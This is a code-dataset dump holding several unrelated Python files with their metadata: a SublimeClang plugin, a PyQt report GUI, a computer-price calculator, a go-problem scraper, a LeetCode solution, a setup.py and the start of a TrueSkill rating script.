\"test.c\"\n compiler = cindex.conf.locate_clang()\n elif language.kind == Language.CPP:\n source = \"test.cpp\"\n compiler = cindex.conf.locate_clang_cpp()\n else:\n raise Error(\"Unsupported language.\")\n\n source = os.path.join(package, source)\n info = common.ClangInfo.collect(compiler, source)\n SystemIncludes = info.internal_isystem\n print(\"Found system includes:\")\n print(SystemIncludes)\n\n # this is 
how we got it from the settings before...\n #sys_includes = common.get_setting(\"system_include_paths\", [])\n\n opt = CompileOptions(language, SystemIncludes)\n\n # This is the bitmask sent to index.parse.\n # For example, to be able to go to the definition of\n # preprocessed macros, set it to 1, for using an implicit\n # precompiled header set it to 4 and for caching completion\n # results, set it to 8. Or all together 1+4+8=13.\n # See http://clang.llvm.org/doxygen/group__CINDEX__TRANSLATION__UNIT.html#gab1e4965c1ebe8e41d71e90203a723fe9\n # and http://clang.llvm.org/doxygen/Index_8h_source.html\n # for more details\n opt.index_parse_type = 13\n\n language_options = common.get_setting(\"language_options\", {})\n if language_options.has_key(language.key()):\n opt.language_options = language_options[language.key()]\n\n project_file, project_options = common.get_project_settings(filename)\n if project_file != None:\n opt.project_file = project_file\n opt.project_options = project_options\n return opt\n\n# initialize cache if not done yet.\n\ndef get_cache():\n import platform\n import os\n if cindex.conf == None:\n try:\n cindex.conf = cindex.Config()\n cindex.arch = sublime.arch()\n cindex.register_enumerations()\n print(cindex.conf.library_file)\n except OSError as err:\n print(err)\n library = cindex.conf.library_file\n if os.system == 'Linux':\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded. On Linux use your package manager to install clang-3.7.1\\n\\n \\\nor alternatively download a pre-built binary from http://www.llvm.org and put it in your ~/bin/\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (library))\n else:\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded.\\n\\n \\\nDownload a pre-built binary from http://www.llvm.org and install it in your system.\\n\\n \\\nNote that the architecture needs to match your SublimeText 2 architecture.\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (library))\n raise err\n\n if tulib.cachelib == None:\n libcache = \"\"\n packages = sublime.packages_path()\n package = os.path.join(packages, \"SublimeClang\")\n arch = sublime.arch()\n try:\n libname = tulib.get_cache_library(arch)\n libcache = os.path.join(package, libname)\n\n tulib.init_cache_lib(libcache)\n print(\"Loaded: '%s'\" % (libcache))\n except OSError as err:\n print(err)\n if os.system == 'Linux':\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded. On Linux you have to compile it yourself.\\n\\n \\\nGo to into your ~/.config/sublime-text-2/Packages/SublimeClang and run make.\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (libcache))\n else:\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded.\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (libcache))\n raise err\n\n if cache.tuCache == None:\n number_threads = 4\n cache.tuCache = TUCache(number_threads)\n\n return cache.tuCache\n\ndef warm_up_cache(view, filename, language):\n cache = get_cache()\n state = cache.get_status(filename)\n\n if state == TUCache.STATUS_NOT_IN_CACHE:\n opts = collect_all_options(view, filename, language)\n cache.prepare(filename, opts)\n\n return state\n\n# process, i.e. 
compile the given file identified by filename.\n# gathers the arguments from project files for compiling.\n# returns a translation unit object\ndef get_translation_unit(view, filename, language, blocking=False):\n    cache = get_cache()\n\n    if common.get_setting(\"warm_up_in_separate_thread\", True) and not blocking:\n        stat = warm_up_cache(view, filename, language)\n        if stat == TUCache.STATUS_NOT_IN_CACHE:\n            return None\n        elif stat == TUCache.STATUS_PARSING:\n            sublime.status_message(\"Hold your horses, cache still warming up\")\n            return None\n\n    opts = collect_all_options(view, filename, language)\n    debug = common.get_setting(\"debug\", False)\n    if debug == True:\n        print(\"Compiling: '%s'\" % (filename))\n        print(\"Language: '%s'\" % (language))\n        print(\"Project File: '%s'\" % (opts.project_file))\n        print(\"Options:\")\n        print(opts)\n\n    return cache.get_translation_unit(filename, opts)\n\nnavigation_stack = []\nclang_complete_enabled = True\n\n\ndef format_current_file(view):\n    row, col = view.rowcol(view.sel()[0].a)\n    filename = get_filename(view)\n    return \"%s:%d:%d\" % (filename, row + 1, col + 1)\n\n\ndef navi_stack_open(view, target):\n    navigation_stack.append((format_current_file(view), target))\n    view.window().open_file(target, sublime.ENCODED_POSITION)\n\n\nclass ClangTogglePanel(sublime_plugin.WindowCommand):\n    def run(self, **args):\n        show = args[\"show\"] if \"show\" in args else None\n        aview = sublime.active_window().active_view()\n        error_marks = common.get_setting(\"error_marks_on_panel_only\", False, aview)\n\n        if show or (show == None and not errormarkers.clang_error_panel.is_visible(self.window)):\n            errormarkers.clang_error_panel.open(self.window)\n            if error_marks:\n                errormarkers.show_error_marks(aview)\n        else:\n            errormarkers.clang_error_panel.close()\n            if error_marks:\n                errormarkers.erase_error_marks(aview)\n\n\nclass ClangToggleCompleteEnabled(sublime_plugin.TextCommand):\n    def run(self, edit):\n        global clang_complete_enabled\n        clang_complete_enabled = not clang_complete_enabled\n        sublime.status_message(\"Clang complete is %s\" % (\"On\" if clang_complete_enabled else \"Off\"))\n\n\nclass ClangWarmupCache(sublime_plugin.TextCommand):\n    def run(self, edit):\n        view = self.view\n        language = get_language(view)\n        filename = get_filename(view)\n\n        stat = warm_up_cache(view, filename, language)\n        if stat == TUCache.STATUS_PARSING:\n            sublime.status_message(\"Cache is already warming up\")\n        elif stat != TUCache.STATUS_NOT_IN_CACHE:\n            sublime.status_message(\"Cache is already warmed up\")\n\n\nclass ClangGoBackEventListener(sublime_plugin.EventListener):\n    def on_close(self, view):\n        if not common.get_setting(\"pop_on_close\", True, view):\n            return\n        # If the view we just closed was last in the navigation_stack,\n        # consider it \"popped\" from the stack\n        filename = get_filename(view)\n        while True:\n            if len(navigation_stack) == 0 or \\\n                    not navigation_stack[\n                        len(navigation_stack) - 1][1].startswith(filename):\n                break\n            navigation_stack.pop()\n\n\nclass ClangGoBack(sublime_plugin.TextCommand):\n    def run(self, edit):\n        assert len(navigation_stack) > 0\n\n        self.view.window().open_file(\n            navigation_stack.pop()[0], sublime.ENCODED_POSITION)\n\n    def is_enabled(self):\n        if len(navigation_stack) == 0:\n            return False\n        view = sublime.active_window().active_view()\n        lang = get_language(view)\n        if lang.is_supported() == False:\n            return False\n\n        return True\n\n    def is_visible(self):\n        return self.is_enabled()\n\n\nclass ClangGotoBase(sublime_plugin.TextCommand):\n    def get_target(self, tu, data, offset, found_callback, 
folders):\n        pass\n\n    def found_callback(self, target):\n        if target == None:\n            sublime.status_message(\"Don't know where the %s is!\" % self.goto_type)\n        elif not isinstance(target, list):\n            navi_stack_open(self.view, target)\n        else:\n            self.targets = target\n            self.view.window().show_quick_panel(target, self.open_file)\n\n    def open_file(self, idx):\n        if idx >= 0:\n            target = self.targets[idx]\n            if isinstance(target, list):\n                target = target[1]\n            navi_stack_open(self.view, target)\n\n    def run(self, edit):\n        view = self.view\n        filename = get_filename(view)\n        language = get_language(view)\n        tu = get_translation_unit(view, filename, language)\n        if tu == None:\n            return\n\n        offset = view.sel()[0].a\n        data = view.substr(sublime.Region(0, view.size()))\n        self.get_target(tu, data, offset, self.found_callback, self.view.window().folders())\n\n\n    def is_enabled(self):\n        return True\n\n    def is_visible(self):\n        view = sublime.active_window().active_view()\n        lang = get_language(view)\n        return lang.is_supported()\n\n\nclass ClangGotoDefinition(ClangGotoBase):\n    def get_target(self, tu, data, offset, found_callback, folders):\n        self.goto_type = \"definition\"\n        return tu.find_definition(data, offset, found_callback, folders)\n\n\nclass ClangGotoDeclaration(ClangGotoBase):\n    def get_target(self, tu, data, offset, found_callback, folders):\n        self.goto_type = \"declaration\"\n        return tu.find_declaration(data, offset, found_callback, folders)\n\n\nclass ClangClearCache(sublime_plugin.TextCommand):\n    def run(self, edit):\n        if cache.tuCache is None:\n            return\n        cache.tuCache.clear()\n        sublime.status_message(\"Cache cleared!\")\n\n\n# test for suppressing diagnostics based on suspected clang bugs.\n# todo: are the messages localized??\ndef suppress_based_on_clang_bug(source_file, message):\n    if source_file.endswith(\".h\") or source_file.endswith(\".hh\") or source_file.endswith(\".hpp\"):\n        if \"cannot use 'throw' with exceptions disabled\" in message:\n            return True\n    return False\n\n# test for suppressing diagnostics based on source file location.\ndef suppress_based_on_location(source_file):\n    suppress_dirs = common.get_setting(\"diagnostic_suppress_dirs\", [])\n    for d in suppress_dirs:\n        if d in source_file:\n            return True\n    return False\n\n# test for suppressing diagnostics based on simple string matching.\ndef suppress_based_on_match(message):\n    suppress_strings = common.get_setting(\"diagnostic_suppress_match\", [])\n    for suppress in suppress_strings:\n        if suppress in message:\n            return True\n    return False\n\n\ndef display_compilation_results(view):\n    filename = get_filename(view)\n    language = get_language(view)\n\n    # todo: this can be None if warm_up_in_separate_thread is true.\n    # fix this somehow?\n\n    tu = get_translation_unit(view, filename, language)\n    assert tu is not None\n\n    errormarkers.clear_error_marks()  # clear visual error marks\n    errormarkers.erase_error_marks(view)\n\n    errString = \"\"\n    errorCount = 0\n    warningCount = 0\n    diagnostics = tu.get_diagnostics()\n\n    for diagnostic in diagnostics:\n        source = diagnostic.filename\n        name = diagnostic.name\n        line = diagnostic.line\n        col = diagnostic.column\n        spelling = diagnostic.spelling\n\n        if diagnostic.is_fatal():\n            if \"not found\" in spelling:\n                message = \"Did you configure the include path used by clang properly?\\n\" \\\n                          \"See http://github.com/ensisoft/SublimeClang for more details on how to configure SublimeClang.\"\n                errString = \"%s\" % (message)\n            message = \"%s:%d,%d - %s - %s\" % (source, line, col, name, spelling)\n            errString = 
\"%s\\n%s\" % (errString, message)\n break\n\n if suppress_based_on_location(source):\n continue\n elif suppress_based_on_match(spelling):\n continue\n elif suppress_based_on_clang_bug(source, spelling):\n continue\n\n message = \"%s:%d,%d - %s - %s\" % (source, line, col, name, spelling)\n if diagnostic.can_ignore():\n if diagnostic.has_suppression():\n disable_flag = diagnostic.disable_flag\n message = \"%s [Disable with %s]\" % (message, disable_flag)\n\n errString = \"%s%s\\n\" % (errString, message)\n if diagnostic.is_warning():\n warningCount += 1\n elif diagnostic.is_error():\n errorCount += 1\n\n errormarkers.add_error_mark(name, source, line - 1, spelling)\n\n if errorCount > 0 or warningCount > 0:\n statusString = \"Clang Status: \"\n if errorCount > 0:\n statusString = \"%s%d Error%s\" % (statusString, errorCount, \"s\" if errorCount != 1 else \"\")\n if warningCount > 0:\n statusString = \"%s%s%d Warning%s\" % (statusString, \", \" if errorCount > 0 else \"\",\n warningCount, \"s\" if warningCount != 1 else \"\")\n view.set_status(\"SublimeClang\", statusString)\n else:\n view.erase_status(\"SublimeClang\")\n\n window = view.window()\n if not window is None:\n show_panel = errString\n window.run_command(\"clang_toggle_panel\", {\"show\": show_panel})\n\n errormarkers.clang_error_panel.set_data(errString)\n errormarkers.update_statusbar(view)\n errormarkers.show_error_marks(view)\n\n\ndef is_member_completion(view, caret):\n regex = re.compile(r\"(([a-zA-Z_]+[0-9_]*)|([\\)\\]])+)((\\.)|(->))$\")\n line = view.substr(Region(view.line(caret).a, caret))\n lang = get_language(view)\n if regex.search(line) != None:\n return True\n elif lang.is_objective_family():\n return re.search(r\"\\[[\\.\\->\\s\\w\\]]+\\s+$\", line) != None\n return False\n\n\nclass ClangComplete(sublime_plugin.TextCommand):\n def run(self, edit, characters):\n regions = [a for a in self.view.sel()]\n self.view.sel().clear()\n for region in reversed(regions):\n pos = 0\n region.end() + len(characters)\n if region.size() > 0:\n self.view.replace(edit, region, characters)\n pos = region.begin() + len(characters)\n else:\n self.view.insert(edit, region.end(), characters)\n pos = region.end() + len(characters)\n\n self.view.sel().add(sublime.Region(pos, pos))\n caret = self.view.sel()[0].begin()\n line = self.view.substr(sublime.Region(self.view.word(caret-1).a, caret))\n if is_member_completion(self.view, caret) or line.endswith(\"::\") or re.search(\"(^|\\W)new\\s+\\w*$\", line):\n self.view.run_command(\"hide_auto_complete\")\n sublime.set_timeout(self.delayed_complete, 1)\n\n def delayed_complete(self):\n self.view.run_command(\"auto_complete\")\n\n\nclass SublimeClangAutoComplete(sublime_plugin.EventListener):\n def __init__(self):\n plugin_settings = common.get_settings()\n plugin_settings.clear_on_change(\"options\")\n plugin_settings.add_on_change(\"options\", self.clear_cache)\n plugin_settings.add_on_change(\"options\", self.load_settings)\n\n # wtf is this?\n common.are_we_there_yet(lambda: self.load_settings())\n self.compile_timer = None\n self.load_settings()\n self.not_code_regex = re.compile(\"(string.)|(comment.)\")\n\n def clear_cache(self):\n if cache.tuCache is None:\n return\n cache.tuCache.clear()\n\n def load_settings(self):\n self.recompile_delay = common.get_setting(\"recompile_delay\", 0)\n self.cache_on_load = common.get_setting(\"cache_on_load\", True)\n self.not_code_regex = re.compile(\"(string.)|(comment.)\")\n self.remove_on_close = common.get_setting(\"remove_on_close\", True)\n 
self.reparse_on_save = common.get_setting(\"reparse_on_save\", True)\n        self.reparse_on_focus = common.get_setting(\"reparse_on_focus\", True)\n        self.reparse_on_edit = common.get_setting(\"reparse_on_edit\", False)\n\n        self.dont_complete_startswith = ['operator', '~']\n\n\n    def is_enabled(self, view):\n        if common.get_setting(\"enabled\", True, view) == False:\n            return False\n        elif clang_complete_enabled == False:\n            return False\n\n        return True\n\n    def is_member_kind(self, kind):\n        return kind == cindex.CursorKind.CXX_METHOD or \\\n            kind == cindex.CursorKind.FIELD_DECL or \\\n            kind == cindex.CursorKind.OBJC_PROPERTY_DECL or \\\n            kind == cindex.CursorKind.OBJC_CLASS_METHOD_DECL or \\\n            kind == cindex.CursorKind.OBJC_INSTANCE_METHOD_DECL or \\\n            kind == cindex.CursorKind.OBJC_IVAR_DECL or \\\n            kind == cindex.CursorKind.FUNCTION_TEMPLATE or \\\n            kind == cindex.CursorKind.NOT_IMPLEMENTED\n\n    def return_completions(self, comp, view):\n        if common.get_setting(\"inhibit_sublime_completions\", True, view):\n            return (comp, sublime.INHIBIT_WORD_COMPLETIONS | sublime.INHIBIT_EXPLICIT_COMPLETIONS)\n        return comp\n\n    def on_query_completions(self, view, prefix, locations):\n        if self.is_enabled(view) == False:\n            return self.return_completions([], view)\n        if clang_complete_enabled == False:\n            return self.return_completions([], view)\n        language = get_language(view)\n        if language.is_supported() == False:\n            return self.return_completions([], view)\n\n        # don't offer completions when the caret sits inside a string, comment or constant scope\n        if not view.match_selector(locations[0], '-string -comment -constant'):\n            return self.return_completions([], view)\n\n        line = view.substr(sublime.Region(view.line(locations[0]).begin(), locations[0]))\n        match = re.search(r\"[,\\s]*(\\w+)\\s+\\w+$\", line)\n        if match != None:\n            valid = [\"new\", \"delete\", \"return\", \"goto\", \"case\", \"const\", \"static\", \"class\", \"struct\", \"typedef\", \"union\"]\n            if match.group(1) not in valid:\n                # Probably a variable or function declaration\n                # There's no point in trying to complete\n                # a name that hasn't been typed yet...\n                return self.return_completions([], view)\n\n        filename = get_filename(view)\n\n        tu = get_translation_unit(view, filename, language)\n        assert tu is not None\n\n        data = view.substr(sublime.Region(0, locations[0]))\n\n        results = tu.complete(data, prefix)\n\n        if results == None:\n            row, col = view.rowcol(locations[0] - len(prefix))\n            unsaved_files = []\n            # todo fix this\n            #if view.is_dirty():\n            #    unsaved_files.append((sencode(view.file_name()),\n            #                      view.substr(Region(0, view.size()))))\n            #    results = tu.cache.clangcomplete(sencode(view.file_name()), row+1, col+1, unsaved_files, is_member_completion(view, locations[0] - len(prefix)))\n\n        if len(self.dont_complete_startswith) and results:\n            i = 0\n            while i < len(results):\n                disp = results[i][0]\n                pop = False\n                for comp in self.dont_complete_startswith:\n                    if disp.startswith(comp):\n                        pop = True\n                        break\n\n                if pop:\n                    results.pop(i)\n                else:\n                    i += 1\n\n        if not results is None:\n            return self.return_completions(results, view)\n        return self.return_completions([], view)\n\n    def reparse_done(self):\n        display_compilation_results(self.view)\n\n    def start_recompile_timer(self, timeout):\n        if self.compile_timer != None:\n            self.compile_timer.cancel()\n            self.compile_timer = None\n\n        # schedule recompile\n        self.compile_timer = 
threading.Timer(timeout, sublime.set_timeout,\n [self.recompile, 0])\n self.compile_timer.start()\n\n\n def recompile(self):\n view = self.view\n unsaved_files = []\n # todo: fix this\n #if view.is_dirty() and common.get_setting(\"reparse_use_dirty_buffer\", False, view):\n # unsaved_files.append((sencode(view.file_name()),\n # view.substr(Region(0, view.size()))))\n\n filename = get_filename(view)\n language = get_language(view)\n\n cache = get_cache()\n opts = collect_all_options(view, filename, language)\n\n if cache.reparse(filename, opts, unsaved_files, self.reparse_done) == False:\n self.start_recompile_timer(1) # Already parsing so retry in a bit\n\n def on_activated(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.reparse_on_focus == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n self.view = view\n self.start_recompile_timer(0.1)\n\n def on_post_save(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.reparse_on_save == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n #print(\"on_post_save\")\n\n\n self.view = view\n self.start_recompile_timer(0.1)\n\n def on_modified(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.reparse_on_edit == False:\n return\n\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n #print(\"on_modified\")\n\n self.view = view\n self.start_recompile_timer(1.0)\n\n def on_load(self, view):\n if self.is_enabled(view) == False:\n return\n\n if self.cache_on_load == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n source = get_filename(view)\n\n warm_up_cache(view, source, lang)\n\n def on_close(self, view):\n if self.remove_on_close == False:\n return\n lang = get_language(view)\n if lang.is_supported() == False:\n return\n\n if cache.tuCache != None:\n filename = get_filename(view)\n cache.tuCache.remove(filename)\n\n def on_query_context(self, view, key, operator, operand, match_all):\n if key == \"clang_supported_language\":\n if view == None:\n view = sublime.active_window().active_view()\n lang = get_language(view)\n return lang.is_supported()\n elif key == \"clang_is_code\":\n return self.not_code_regex.search(view.scope_name(view.sel()[0].begin())) == None\n elif key == \"clang_complete_enabled\":\n return clang_complete_enabled\n elif key == \"clang_automatic_completion_popup\":\n return True\n elif key == \"clang_panel_visible\":\n return errormarkers.clang_error_panel.is_visible()\n","sub_path":"clang-complete.py","file_name":"clang-complete.py","file_ext":"py","file_size_in_byte":26813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"331724200","text":"import time\nimport json\nfrom PyQt5.Qt import *\nfrom resource.report2 import Ui_Form\nfrom gen_report.make_report import make_reports\n\n\nclass ReportGui(QWidget, Ui_Form):\n # send_signal = pyqtSignal(float, float, str, str)\n\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.setWindowTitle('生成报表工具')\n self.resize(500, 344)\n self.center()\n current_time = time.time()\n str_time = time.strftime('%Y-%m-%d', time.localtime(current_time - 3600 * 24))\n ed_time = time.strftime('%Y-%m-%d', time.localtime(current_time))\n self.st_time = str_time + ' 08:00:00'\n self.ed_time = ed_time + ' 08:00:00'\n self.st_le.setText(self.st_time)\n self.ed_le.setText(self.ed_time)\n self.le_regular()\n\n def center(self):\n qr = 
self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def le_regular(self):\n reg_exp = QRegExp(\n '^\\d{4}-(0?[1-9]|1[0-2])-(([012])?\\d|3[01]) (([01])?\\d|2[0-3]):[0-5]\\d:[0-5]\\d$'\n )\n time_limit = QRegExpValidator(reg_exp)\n self.st_le.setValidator(time_limit)\n self.ed_le.setValidator(time_limit)\n\n def gen_csv(self):\n st_time_str = self.st_le.text()\n ed_time_str = self.ed_le.text()\n\n st = 0\n ed = 0\n if st_time_str:\n try:\n st = time.mktime(time.strptime(st_time_str, '%Y-%m-%d %H:%M:%S'))\n except:\n self.tips('时间输入有误')\n self.st_le.setText(self.st_time)\n return\n if ed_time_str:\n try:\n ed = time.mktime(time.strptime(ed_time_str, '%Y-%m-%d %H:%M:%S'))\n except:\n self.tips('时间输入有误')\n self.ed_le.setText(self.ed_time)\n return\n if all([st, ed]) and st >= ed:\n self.tips('时间输入有误')\n return\n self.gen_btn.setEnabled(False)\n self.gen_btn.setText('GENERATING')\n thread = TSend(st, ed, st_time_str, ed_time_str)\n thread.signal.connect(self.tips)\n thread.start()\n thread.exec()\n # thread.wait()\n\n def tips(self, info: str):\n QMessageBox.information(self, '', info, QMessageBox.Ok)\n self.gen_btn.setEnabled(True)\n self.gen_btn.setText('GENERATE')\n\n\nclass TSend(QThread):\n signal = pyqtSignal(str)\n\n def __init__(self, st, ed, st_time_str, ed_time_str):\n super().__init__()\n self.st = st\n self.ed = ed\n self.st_time_str = st_time_str\n self.ed_time_str = ed_time_str\n\n def run(self):\n with open('config.json') as f:\n config = json.load(f)\n url = config.get('url')\n if not url:\n self.signal.emit('配置url出错')\n if make_reports(url, self.st, self.ed, self.st_time_str, self.ed_time_str):\n self.signal.emit('生成成功')\n else:\n self.signal.emit('生成失败')\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n window = ReportGui()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"report_gui.py","file_name":"report_gui.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385379920","text":"wantedcpu=input(\"CPU\")\nwantedgpu=input(\"GPU\")\nwantedstoragedevicetype=input(\"StorageDevice\")\nwantedram=int(input(\"RAM\"))\nwantedcomputer=int(input(\"How many computer do you want to buy?\"))\ndef init():\n wantedcpu=input(\"CPU\")\n wantedgpu=input(\"GPU\")\n wantedstoragedevicetype=input(\"StorageDevice\")\n wantedram=int(input(\"RAM\"))\n wantedcomputer=int(input(\"How many computer do you want to buy?\"))\nintel=0\namd=0\nprice1=0\nprice2=0\nprice3=0\nprice4=0\noverallsum=0\nbulksum=0\ndef cpu(wantedcpu):\n global price1\n if wantedcpu==\"INTEL\":\n price1=320\n elif wantedcpu==\"AMD\":\n price1=300\n else:\n price1=290\n return price1\ndef gpu(wantedgpu):\n global price2\n if wantedgpu==\"INTEL\":\n price2=100\n elif wantedgpu==\"NVIDIA\":\n price2=150\n else:\n price2=145\n return price2\ndef storagedevice(wantedstoragedevicetype):\n global price3\n if wantedstoragedevicetype==\"HDD\":\n price3=200\n elif wantedstoragedevicetype==\"SSD\":\n price3=300\n else:\n print(\"Please check your answer\")\n return price3\ndef ram (wantedram):\n global price4\n for i in range (0,wantedram):\n price4+=25\n return price4\ndef sumintel ():\n global overallsum\n overallsum = price1 + (price2*0.95) + price3 + price4\n return overallsum\ndef sumamd():\n global overallsum\n overallsum = price1 + (price2*0.90) + price3 + price4\n return overallsum\ndef sum():\n global overallsum\n overallsum = price1 + 
price2 + price3 + price4\n    return overallsum\n\ncpu(wantedcpu)\ngpu(wantedgpu)\nstoragedevice(wantedstoragedevicetype)\nram(wantedram)\nif wantedcpu == \"INTEL\" and wantedgpu==\"INTEL\":\n    sumintel()\nelif wantedcpu == \"AMD\" and wantedgpu==\"ATI\":\n    sumamd()\nelse:\n    sum()\nif wantedcomputer>1:\n    for i in range (0,wantedcomputer):\n        bulksum+=overallsum\n    print(bulksum)\nelif wantedcomputer==1:\n    print(overallsum)\n\nif overallsum > 800 or bulksum >800:\n    print(\"Congratulations!\\n You won free antivirus for more than 800$$ \")\nif wantedcpu == \"QUIT\" or wantedgpu == \"QUIT\" or wantedstoragedevicetype == \"QUIT\":\n    exit()\n\n\n\n","sub_path":"fatihodev2.py","file_name":"fatihodev2.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"651718608","text":"import requests;\nimport re;\nfrom Sgf import Sgf;\nfrom DBHelper import DBHelper;\nimport xlrd\nimport random\n\ndef genSgfToDB():\n    list = []\n    # list7k = fetchUrlList(\"https://www.101weiqi.com/7K/?page=\", 2000)\n    # list.extend(list7k)\n    list6k = fetchUrlList(\"https://www.101weiqi.com/2D/?page=\", 2000)\n    list.extend(list6k)\n    print(len(list))\n\n    # for i in range(61, 65):\n    #     toDB(list, i, 5);\n\n    toDB(list, 65, 5);\n\n\ndef fetchUrlList(listUrl, limit):\n    list = []\n    page = 1\n    while len(list) <= limit:\n        resp = requests.get(listUrl + str(page))\n        if resp.status_code != 200:\n            print(\"Error: status_code=\" + str(resp.status_code))\n\n        pat = re.compile(r"
    \", re.DOTALL)\n findList = pat.findall(resp.text)\n print(len(findList))\n list.extend(findList)\n page += 1\n\n print(\"finish:\" + listUrl)\n return list\n\n\ndef toDB(list, level, limit):\n successCount = 0\n for i in range(0, len(list)):\n item = list.pop(random.randint(0, len(list)-1))\n url = 'https://www.101weiqi.com' + item[0]\n sgf = fillSgf(url, None, level)\n\n if sgf.sgf_text == None:\n print(\"Gen Error:\" + sgf.url)\n continue\n else:\n successCount += 1;\n print(\"success \" + str(successCount))\n DBHelper().save(sgf)\n\n if successCount >= limit:\n break\n\n print(\"--------------\" + str(i) + '\\n\\n')\n\ndef genSgfExcelToDB(filename):\n data = xlrd.open_workbook(filename)\n table = data.sheets()[0]\n for rownum in iter(range(table.nrows)):\n if rownum == 0:\n continue\n lineItem = table.row_values(rownum);\n url = lineItem[0];\n level = lineItem[1];\n if url == None or len(url) == 0:\n continue\n print(lineItem)\n\n sgf = fillSgf(url, level)\n if sgf.sgf_text == None:\n return None\n DBHelper().save(sgf);\n\ndef fillSgf(url, thumbnail, level):\n sgf = Sgf()\n sgf.url = url\n if thumbnail == None:\n sgf.thumbnails = getThumbnails(sgf.url)\n else:\n sgf.thumbnails = thumbnail\n sgf.html_info = fetchItem(sgf.url)\n sgf.sgf_text = sgf.genSgfText()\n sgf.go_level = level\n sgf.level_id = level\n print(sgf.url)\n return sgf\n\ndef getThumbnails(url):\n print('getThumbnails=' + url)\n searchObj = re.search(r\"https?://www.101weiqi.com/.+?/(\\d+?)/\", url, re.M);\n id = searchObj.group(1);\n if id == None:\n return \"\";\n return \"/file/newimg/\" + id + \".png\"\n\n\ndef fetchItem(url):\n resp = requests.get(url);\n if resp.status_code != 200:\n print(\"Error: status_code=\" + resp.status_code);\n\n searchObj = re.search(r'var g_qq\\s*=\\s*(.*);var taskinfo', resp.text, re.M);\n jsonText = searchObj.group(1);\n# print(jsonText);\n return jsonText;\n\n\n\n# genSgfExcel2DB(\"/Users/liuming/_work/flutter/res/excel/sgf_30_level_1.xlsx\");\n\n\ngenSgfToDB();\n","sub_path":"flutter_script/com/aiqiyi/go/script/101Spider.py","file_name":"101Spider.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391709114","text":"# https://leetcode-cn.com/problems/palindrome-partitioning/\r\n\r\n\r\nclass Solution:\r\n def partition(self, s):\r\n split_result = []\r\n if len(s) == 0:\r\n return split_result\r\n\r\n def back(start=0, res=[]):\r\n if start >= len(s):\r\n split_result.append(res)\r\n return\r\n for end in range(start + 1, len(s) + 1):\r\n split_s = s[start:end]\r\n # 如果当前子串为回文串,则可以继续递归\r\n if split_s == s[start:end][::-1]:\r\n back(end, res + [split_s])\r\n\r\n back()\r\n return split_result\r\n\r\n\r\ns = 'aab'\r\nprint(Solution().partition(s))\r\n","sub_path":"131-2-Palindrome Partitioning-递归.py","file_name":"131-2-Palindrome Partitioning-递归.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126637455","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport sys\nfrom setuptools import setup, find_packages\nimport warnings\n\nmsg = \"\"\"\nCould not detect PyQt4. Install PyQt4 system wide. 
If you are in\na virtualenv install the vext.pyqt4 package: \n\n $ pip install astro-tigger[venv]\n\n\"\"\"\n\ntry:\n import PyQt4\nexcept ImportError:\n warnings.warn(msg)\n\n\n__version__ = \"1.4.0\"\n\nrequirements = ['astro_kittens', 'numpy', 'scipy', 'astlib', 'pyfits', 'astro_tigger_lsm' ]\n\nscripts = [\n 'TigGUI/tigger',\n]\n\npackage_data = {'TigGUI': [\n 'icons/*.png',\n 'tigger.conf',\n] }\n\nextras_require = {\n 'venv': ['vext.pyqt4'],\n}\n\n\nsetup(\n name =\"astro-tigger\",\n version=__version__,\n packages=find_packages(),\n extras_require=extras_require,\n scripts=scripts,\n package_data=package_data,\n description=\"yet another FITS image viewer\",\n author=\"Oleg Smirnov\",\n author_email=\"osmirnov@gmail.com\",\n url=\"https://github.com/ska-sa/tigger\",\n install_requires=requirements,\n)\n\n","sub_path":"pypi_install_script/astro-tigger-1.4.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"436306135","text":"#!/usr/bin/env python3\n\nimport itertools\nimport math\nimport collections\nimport os\n\nimport trueskill\n\nfrom elo import doubles\n\nPlayerStats = collections.namedtuple('PlayerStats', ['rating', 'games_played', 'games_won'])\n\n\ndef pretty_unranked_players(players):\n for player, stats in sorted(players):\n yield \"%s (%s)\" % (player, stats.games_played)\n\n\ndef new_player_stats():\n return PlayerStats(trueskill.Rating(), 0, 0)\n\n\ndef win_probability(team1, team2):\n delta_mu = sum(r.mu for r in team1) - sum(r.mu for r in team2)\n sum_sigma = sum(r.sigma ** 2 for r in itertools.chain(team1, team2))\n size = len(team1) + len(team2)\n denom = math.sqrt(size * (trueskill.BETA * trueskill.BETA) + sum_sigma)\n ts = trueskill.global_env()\n return ts.cdf(delta_mu / denom)\n\n\ndef pretty_rating(rating):\n return 